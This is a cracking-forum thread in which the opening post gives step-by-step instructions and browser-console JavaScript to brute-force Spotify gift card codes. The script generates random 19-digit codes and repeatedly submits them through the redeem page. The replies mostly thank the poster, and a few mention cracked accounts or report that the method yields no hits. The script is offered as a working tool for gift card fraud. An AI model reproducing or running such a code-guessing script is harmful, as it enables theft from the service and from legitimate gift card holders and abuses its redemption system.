kxee

Spotify Giftcard Generator + Checker

Recommended Posts

I'm not responsible for what is done to your account.

This method is not by me it's by a user on nulled.

I thought of sharing it here :)

 

I like that GREEN

 

[hide] 1. Go to https://www.spotify.com/us/redeem/

 2. Sign in.

 3. Press ctrl+shift+j (to open console).

 4. Paste the following code in and click enter.

 5. Follow the prompts and begin generating+checking!

var speed = prompt("Speed of checker/gen (Recommended 1000 for fast pcs, 500 for slow)")
var zip = prompt("Zipcode (leave blank for default)") + "10008"
function generateCode() {
 var code = "";
 var chars = "0123456789"; 
 for (var i = 0; i < 19; i++)
   code += chars.charAt(Math.floor(Math.random() * chars.length));
 return code;
}
function main() {   
   document.getElementById("redeem_code_token").value = generateCode();
   document.getElementById("redeem_code_zip-code").value = zip;
   document.getElementById("redeem_code_submit").click();
}

setInterval(function() {
   main();
}, speed);

 

NOTE: If there is no "zip code" section, please use the code below.

 

 

var speed = prompt("Speed of checker/gen (Recommended 1000 for fast pcs, 500 for slow)")
function generateCode() {
 var code = "";
 var chars = "0123456789"; 
 for (var i = 0; i < 19; i++)
   code += chars.charAt(Math.floor(Math.random() * chars.length));
 return code;
}
function main() {   
   document.getElementById("redeem_code_token").value = generateCode();
   document.getElementById("redeem_code_submit").click();
}

setInterval(function() {
   main();
}, speed); 

 

 

 

[/hide]

Share this post


Link to post
Share on other sites

I'm not responsible for what is done to your account.

This method is not by me it's by a user on nulled.

I thought of sharing it here :)

 

I like that GREEN

 

 

 

Some prof it is working? No one of that metod whit inspect element is working. Nobody get hits.

Share this post


Link to post
Share on other sites

Sounds great.

Cheers!

Share this post


Link to post
Share on other sites

I'm not responsible for what is done to your account.

This method is not by me it's by a user on nulled.

I thought of sharing it here :)

 

I like that GREEN

 

 

 

Some prof it is working? No one of that metod whit inspect element is working. Nobody get hits.

 

hit rate is 0.000000001

Share this post


Link to post
Share on other sites

thanks for the share bud. im tired of upgrading :smart:

Share this post


Link to post
Share on other sites

I'm not responsible for what is done to your account.

This method is not by me it's by a user on nulled.

I thought of sharing it here :)

 

I like that GREEN

 

 

thx man. love u

Share this post


Link to post
Share on other sites

im tired of getting kicked of cracked spotify accs

Share this post


Link to post
Share on other sites

ty man lol arazr zr

Share this post


Link to post
Share on other sites

going to check this out, thanks in advance.

Share this post


Link to post
Share on other sites

tyyyyyyyyyyyyyyyyyyyyyyyyyyyyy bro

Share this post


Link to post
Share on other sites

I'm not responsible for what is done to your account.

This method is not by me it's by a user on nulled.

I thought of sharing it here :)

 

I like that GREEN

 

 

 

THANK YOU FOR SHARINGs

Share this post


Link to post
Share on other sites

I'm not responsible for what is done to your account.

This method is not by me it's by a user on nulled.

I thought of sharing it here :)

 

I like that GREEN

 

 

 

:fiesta: :fiesta: :fiesta: :fiesta:

Share this post


Link to post
Share on other sites

Nice share man thanks

Share this post


Link to post
Share on other sites

I'm not responsible for what is done to your account.

This method is not by me it's by a user on nulled.

I thought of sharing it here :)

 

I like that GREEN

 

 

 

 

thankyou

thankyou

thankyou

thankyou

Share this post


Link to post
Share on other sites

Thanks for this amazing release.

Share this post


Link to post
Share on other sites

I'm not responsible for what is done to your account.

This method is not by me it's by a user on nulled.

I thought of sharing it here :)

 

I like that GREEN

 

 

 

appreciate this man :kek: :pogchamp:

Share this post


Link to post
Share on other sites

big thanks for you <3

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.